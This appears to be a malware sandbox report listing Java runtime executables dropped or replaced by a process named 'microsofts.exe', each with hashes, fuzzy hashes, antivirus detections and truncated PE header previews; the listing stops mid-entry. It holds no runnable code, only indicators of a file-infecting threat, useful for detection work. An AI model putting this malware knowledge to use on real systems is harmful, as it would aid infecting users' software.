                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3145728:ZLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:pBWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:66A16154C1AD6A3F2D33C7907E2ABFD6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:36098FB731A4FCD11E76C9675B39CE379D3E2098
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:923A1DF18D48DDEE99B84EBA3C30F23F00F4B60851AD005E6043938892F1E83B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:92DF8A85C455CDEC90FE14FE438DE9ABF70B7973B655B3B16E6445EEF7FA9A84C1F9D8AEDFBF4DA49BD2041A0F28117B1552B149907B220D7BE8F7D9517418A3
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.....0.L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1158144
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.068081620954522
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:RxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:RxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:385DDF10AA4AFFFC23DED4C16D86BE1A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4409ABDEAAD4C53B5B37C6F9E2D57AB351186292
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:19451FDAC27F35B27B7A66735A93379E5A6660D9A78F06173F1CCED3211B43EB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CB2799F91D594DA6D4CBE6FCB321075CED309198EC04253E26A9DCB4D7B58BAE93A06EA1288A05282012A276627677993FB3AA039F614DE6B9CEA5E40FDCE67D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.........................................................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032408283818907
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:vKqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SqsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:819D434DC69F0357EBA5CA7A0C8BBB1E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:296E8394BEA2C5894F9E88B1AD2355F75C337634
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3C0932DB7B0EF648CE7A578BB108B3F41DB1D387E6B0F2FACD0139E41FF47F7D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BAE2358D06F90C3B69F0AD7A7EBC5CFC56227E12934FE050FA864262B84195A6B5E453F65E5FF1B9036CF810D5B92D94CE4334778E412C5537747E27A57BF7D1
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................dp.......................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4460515589078495
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:4nEbH0j4x7R6SvyCMjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:4kwOtO7jsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8D8DE7FAD8D3750B0313B72B271DA880
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DECE716AE27F479BE8D9D94FF2C0AAD3A5C8650A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:588597358CEE98958E8398F4489B71D7E49BDF7A24F88DD4ABA5AF0A55F31E35
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6B51699D03C300389CB928AE8193EAE7D1119BFAEEC9FD5AB4BDEFE6C02A5DDC64358B70A265F44247B9A1CF42297B9F0460B3F029D9040CB47AA49881C61937
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......2........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1212416
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.119728566941759
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:Sv1vveXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:u1+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7C22AECE25A829DA55A2D9D18C90B53F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7A61C392531E0407215B5A3E5764AA76C06C49EB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3DAFA7AEBB592A665AF4BC765D863542378D890CBF935C03C2855A40064D4F6F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B3855517020A5911AD9225B2EA5919504F0C58927C48E85F848F09AB1911F7610F60BE3D60DABA73195711945BF2E6300D5DFEEA64E874CEDFE538805C744848
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.................................0.......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.446814314368805
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:rnU/h/4KAsqjnhMgeiCl7G0nehbGZpbD:rU/V8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:05D9502885A6D62F11D38E4BED8235EC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:79B657326F1C7D844547C1D770D20ECC3C8C7617
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:074A5CC0A83E6691663D41455673C86C82C15DA48D58C7B50DB6D4FE96E68FFE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:01CC440EBDF43B76CE68AED7AD193ABF4F8A4BD593BFFA529086E5444DA7663D18C4A1218AA47F9F2D0B0ECA58812F4884026CC2B13228BB4BBCC85B24659FD5
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@.......d.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.483733623013464
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Hx71iBLZ05jNTmJWExfsqjnhMgeiCl7G0nehbGZpbD:HxhiHIjNgDDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:67D478D2ACF8F83F91E15FC04F5BB7CC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6EDE17C41D975643E7B60ED43A664042751E41C9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:008A0B4B563EE8F91FA5EAC693DAE66E3D0872DDAAAE4EE3724AE8B0DFB2A0AD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3D404D77BC79B6CA8B157D2DE4EA25CF9B9B29434D7E0356734750674ECC75E20F9D4B31D730A7B2BCDB37090D658B0ECEEA39FA203F748F217359EDEA027817
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032887214427371
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:j3raXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:342F183A9F75BE8BC9D391D57939BF06
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D9371E5B8B8ED1BFE912FEBDE5B9090236FBD4C4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF4C7DD6C3A705735485B4B6D2EBD37221BFAC3F291C72B34BA451D473807610
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:513514A82EBD9A78438D8D9D672A7851CDC46B00F2BAFCD8BCF853571107B28DEC2F5E5FB1A9D71E9C52BD7630F41E91E678B6D9EB3AE7FA32D4B2600EC55A8A
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................H(.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1242112
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1726740658526875
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:SYdP/NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zdP/NsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BEB71E6485CD0F5EA39C8372E2E03900
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7720CB2FE41637193C62BBD4761D490B3A9ABF9F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CB52936716ABFDFC71CB2B215FACF6FA07D1A5489083E07A86E6557A0C06590C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7B9BE925E89C0FC7B37ED9CFA1EEA6539127DDF6EE58921986EFAEDDC77447BE43012CBEA9B9D793E0C46285030BEB63BE3453E2C70F357DA028286BB1689D18
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P......?...........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032903461496591
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:sy5yXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:BgsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:48DC43A3EDEAB9784D6212F96AD685FA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:42DA8CACC16F5577A2BAF16C8131C3E0EEA542CA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DDDA934F49021CEE7103B31FEA4126942FBD9442F641F691485CB088723139B0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6F321063FBF97F449F0DDA20ECE502ADAD330DD388EDC50932E4E410C16794BB411F285B4F76133E2D77BF598B16E21A5066064D6878963C28DBF6B36616E132
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032977228685118
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:+KlqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/EsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9F049974D3F1007E3B7B3A687DAF066F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6230F8504C0E8C7DF1F94295E5A7073FFB2E1297
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2D63BB5E851DFC23F6B194BE8963558F0A30D59C05C618DBFF998C5EE716D43E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:11D108E923D872354C24F6DBFD5BF0E2315DE644BC523DBB55E302A3791ADFBF09CA103E9D8F0671F40F0E783CC4157144E3E5AA03F5795260DFA9271AD408F6
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032982622751435
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:CilqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zEsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:672748C1F93C4331EFD1E308B3B7634B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C5106F2EC63E214CC5D2D0A340033D8987F55B4E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E3B05AE4C44CFD31B689302CFEF5F72FB34CF4AB62571416E0DC3F32E09113BB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CB7607312B3A88791A53F93DD07E2A7809BE1E09532FA5E5EA93DA7914646FD11F60B3C1CF85746C94598B7411A1FA801B9091DF67394A511849C0D07962A202
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................d........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032948555444677
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:kTmKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:23sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8F46E2C92E9B0663FC131CAD6E2607C4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C9A5D5189771AC5DFC9E96CFA105F104C4DD4416
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F5D43EBA2B2ED3342BCE66EA4E17A426DEBD57973BCB0A31FDC91C1C9B173018
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:233AECD61CE69E0A7AE9C01FB2FF276CD32D96DE506F021D3AF34F6089C60130EE5170D3DABE9D52F354B552E0C393EEEC1089FD961C580F0B0ACE8E423E8E8A
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@................................."........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.033874644951663
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:PameXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:542C9BFF6C241CAB044C0AE6D605FC7F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D77F63098AC3F034B477DCDD712493A582EBE735
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4AD5A61460FBC7D24E30448F00543B34FB17C76C5BB62D911527B665A047E851
